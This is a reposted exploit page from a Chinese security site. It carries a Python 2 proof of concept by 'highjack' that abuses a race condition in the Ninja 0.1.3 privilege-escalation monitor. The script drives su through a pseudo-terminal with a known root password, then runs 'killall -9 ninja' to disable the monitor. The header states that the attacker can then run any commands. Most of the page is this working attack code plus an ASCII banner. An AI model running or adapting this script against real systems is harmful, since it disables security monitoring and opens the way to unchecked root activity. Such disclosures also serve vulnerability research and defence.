Ninja Privilege Escalation Detection and Prevention System 0.1.3

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Conditio

来源：http://highjack.github.io/ 作者：highjack 发布时间：2015-04-30

#[Title] Ninja privilege escalation detection and prevention system race condition

#[Author] Ben 'highjack' Sheppard

#[URL] http://highjack.github.io/

#[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.

#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.

#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.

#[Software Link] http://forkbomb.org/ninja/

#[Date] 29/04/2015

#[Version] 0.1.3

#[Tested on] Kali Linux

#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg

#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court

#https://www.youtube.com/watch?v=eA136fOsSeQ

import pty, os, sys, subprocess

pid, fd = pty.fork()

#begin config

user = "root"

password = "mypassword" #change this :)

command = "killall -9 ninja"

#end config

def usage():

print """

@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@ @@@@@@ @@@@@@@ @@@ @@@

@@@ @@@ @@@ @@@@@@@@@ @@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@ @@@

@@! @@@ @@! !@@ @@! @@@ @@! @@! @@@ !@@ @@! !@@

!@! @!@ !@! !@! !@! @!@ !@! !@! @!@ !@! !@! @!!

@!@!@!@! !!@ !@! @!@!@ @!@!@!@! !!@ @!@!@!@! !@! @!@@!@!

!!!@!!!! !!! !!! !!@!! !!!@!!!! !!! !!!@!!!! !!! !!@!!!

!!: !!! !!: :!! !!: !!: !!! !!: !!: !!! :!! !!: :!!

:!: !:! :!: :!: !:: :!: !:! !!: :!: :!: !:! :!: :!: !:!

:: ::: :: ::: :::: :: ::: ::: : :: :: ::: ::: ::: :: :::

: : : : :: :: : : : : : ::: : : : :: :: : : :::

[Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition

[Author] Ben 'highjack' Sheppard

[URL] http://highjack.github.io/

[Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected.

It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.

The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.

"""

executions = 0

def check_procs():

p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)

p2 = subprocess.Popen(["grep", "root"], stdin=p1.stdout, stdout=subprocess.PIPE)

p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)

output = p3.communicate()[0]

if output != "":

if executions != 0:

sys.exit(0)

return True

else:

return False

def kill_ninja():

if pid == 0:

os.execvp("su", ["su", user, "-c", command])

elif pid > 0:

try:

os.read(fd, 1024)

os.write(fd, password + "\n")

os.read(fd,1024)

os.wait()

os.close(fd)

except:

usage()

print "[+] Ninja is terminated"

sys.exit(0)

while True:

kill_ninja()

if (check_procs == True):

executions = executions + 1

kill_ninja()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告